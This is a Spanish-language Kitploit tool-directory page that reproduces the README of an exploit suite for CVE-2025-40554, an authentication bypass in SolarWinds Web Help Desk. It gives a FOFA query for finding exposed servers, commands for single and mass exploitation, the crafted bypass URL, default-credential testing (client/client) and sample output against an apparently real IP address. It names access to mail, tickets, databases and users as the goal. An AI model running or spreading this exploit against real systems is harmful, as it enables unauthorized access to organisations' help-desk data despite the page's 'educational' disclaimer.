Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-40554 — Explotación de CVE-2025-40554 | Kitploit
Herramientas/GitHubGitHub/skynoxk/cve-2025-40554
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAutenticación
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

Explotación de CVE-2025-40554

Ver Repositorio
8hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-40554 Suite de Explotación

Una herramienta integral de pruebas de seguridad para detectar y explotar la vulnerabilidad de omisión de autenticación (CVE-2025-40554 / CVE-2025-40536) en SolarWinds Web Help Desk.

⚠️ Aviso Legal

SOLO CON FINES EDUCATIVOS Y DE PRUEBAS DE SEGURIDAD AUTORIZADAS

Esta herramienta se proporciona para investigación de seguridad, pruebas de penetración y evaluación de vulnerabilidades en sistemas que posea o para los cuales tenga permiso explícito por escrito. El acceso no autorizado a sistemas informáticos es ilegal. Los autores no se responsabilizan por el mal uso o daños causados por esta herramienta.

🔍 Resumen de la Vulnerabilidad

CVE-2025-40554 es una vulnerabilidad crítica de omisión de autenticación en SolarWinds Web Help Desk que permite a atacantes no autenticados:

  • Omitir mecanismos de autenticación
  • Acceder a funciones administrativas privilegiadas (Autenticación)
  • Enumerar la configuración del sistema

Versiones Afectadas

  • SolarWinds Web Help Desk (la información de versiones específicas debe verificarse)
  • Consulte los avisos de seguridad de SolarWinds para versiones parcheadas

🚀 Características

Compruébelo usted mismo :))

Dependencias:

  • Python 3.6+
  • biblioteca requests
  • biblioteca urllib3

🛠️ Instalación

# Clone o descargue el script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# Hacerlo ejecutable
chmod +x CVE-2025-40554.py

📖 FOFA

("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 Uso

Escaneo Básico (Objetivo Único)

# Verificación simple de vulnerabilidad
python3 CVE-2025-40554.py -t https://target:8443

# Con protocolo explícito
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

Modo de Explotación Completa

# Explotación completa con enumeración de sesiones
python3 CVE-2025-40554.py -t https://target:8443 --exploit

# Omitir prueba de credenciales por defecto
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login

Escaneo Masivo

# Escanear múltiples objetivos desde un archivo
python3 CVE-2025-40554.py -l targets.txt

# Escaneo masivo con explotación
python3 CVE-2025-40554.py -l targets.txt --exploit

# Modo silencioso (salida mínima)
python3 CVE-2025-40554.py -l targets.txt -q

# Archivo de salida personalizado
python3 CVE-2025-40554.py -l targets.txt -o results.txt

Formato del Archivo de Objetivos

targets.txt:

https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# Los comentarios están soportados

🎯 Opciones de Línea de Comandos

OpciónDescripción
-t, --target URLURL del objetivo único a probar
-l, --list FILEArchivo que contiene una lista de objetivos (uno por línea)
--exploitHabilita el modo de explotación completa con enumeración
--no-loginOmite la prueba de credenciales por defecto
-o, --output FILEArchivo de salida para objetivos vulnerables (por defecto: vulnerable_targets.txt)
-q, --quietModo de salida mínima (útil para escaneos masivos)

📊 Ejemplos de Salida

Explotación Exitosa

╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     Herramienta de Explotación por Omisión de Autenticación       ║
║     Solo con fines de Investigación y Educativos                  ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
Objetivo: https://203.106.221.203:8443
======================================================================
[*] Paso 1: Estableciendo sesión...
[+] WOSID extraído: AbCdEfGhIjKlMnOpQrStU
[+] Token XSRF: abc123-def456-ghi789

[*] Paso 2: Probando omisión de autenticación...
[+] Indicadores de omisión encontrados: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - ¡Omisión de autenticación confirmada!

[*] Paso 3: Probando credenciales por defecto (client/client)...
[+] ÉXITO - ¡Las credenciales por defecto funcionan!

======================================================================
MODO DE EXPLOTACIÓN - Omisión de Autenticación CVE-2025-40554
======================================================================

[*] URL de omisión: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Activando omisión de autenticación...
[+] ¡Omisión de autenticación exitosa!

[*] Cookies de Sesión:
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
RESUMEN
======================================================================
[+] El objetivo es VULNERABLE a CVE-2025-40554
[+] Credenciales por defecto: FUNCIONAN
======================================================================

Resultados de Escaneo Masivo

[*] Cargados 5 objetivos únicos desde targets.txt
[*] Modo: Omisión + prueba de credenciales por defecto
[*] Explotación completa habilitada

[1/5] Probando https://target1:8443
[+] VULNERABLE - ¡Omisión de autenticación confirmada!
[+] ÉXITO - ¡Las credenciales por defecto funcionan!

[2/5] Probando https://target2:8443
[!] NO VULNERABLE - Omisión de autenticación fallida

...

======================================================================
RESUMEN DEL ESCANEO
======================================================================
Total escaneados:   5/5
Vulnerables:        2
Con cred. por defecto: 1
======================================================================

[+] Resultados guardados en: vulnerable_targets.txt

🔧 Detalles Técnicos

Flujo de Explotación

  1. Establecimiento de Sesión

    • Se conecta a la instancia WHD
    • Extrae WOSID (ID de Sesión de WebObjects) de múltiples fuentes
    • Captura el token XSRF si está presente
  2. Omisión de Autenticación

    • Construye URL maliciosa con inyección de WOSID
    • Explota el path traversal en el enrutamiento de WebObjects
    • Omite las comprobaciones de autenticación
  3. Prueba de Credenciales (opcional)

    • Analiza el formulario de inicio de sesión con protección CSRF
    • Prueba credenciales por defecto (client/client)
    • Valida la autenticación exitosa
  4. Explotación Completa (modo --exploit)

    • Exporta cookies de sesión
    • acceder a correo, tickets, base de datos, usuarios, (eliminado)

Indicadores de Vulnerabilidad

La herramienta detecta una omisión exitosa verificando:

  • externalAuthContainer - Configuración de autenticación externa
  • JSONRpcClient - Exposición de cliente API
  • SAML 2.0 - Configuración de SSO
  • LoginPref - Ajustes de preferencias de inicio de sesión
  • authMode - Ajustes del modo de autenticación

🤝 Contribuciones

Las contribuciones son bienvenidas.....

📚 Referencias

  • Detalles de CVE-2025-40554
  • Detalles de CVE-2025-40536
  • Avisos de Seguridad de SolarWinds
  • Documentación del Framework WebObjects

📄 Licencia

Esta herramienta se proporciona "tal cual" sin garantía de ningún tipo. Úsela bajo su propio riesgo.

👤 Autor

Skynoxk


Recuerde: Siempre piratee ética y legalmente. El acceso no autorizado es un delito.

Descargar herramienta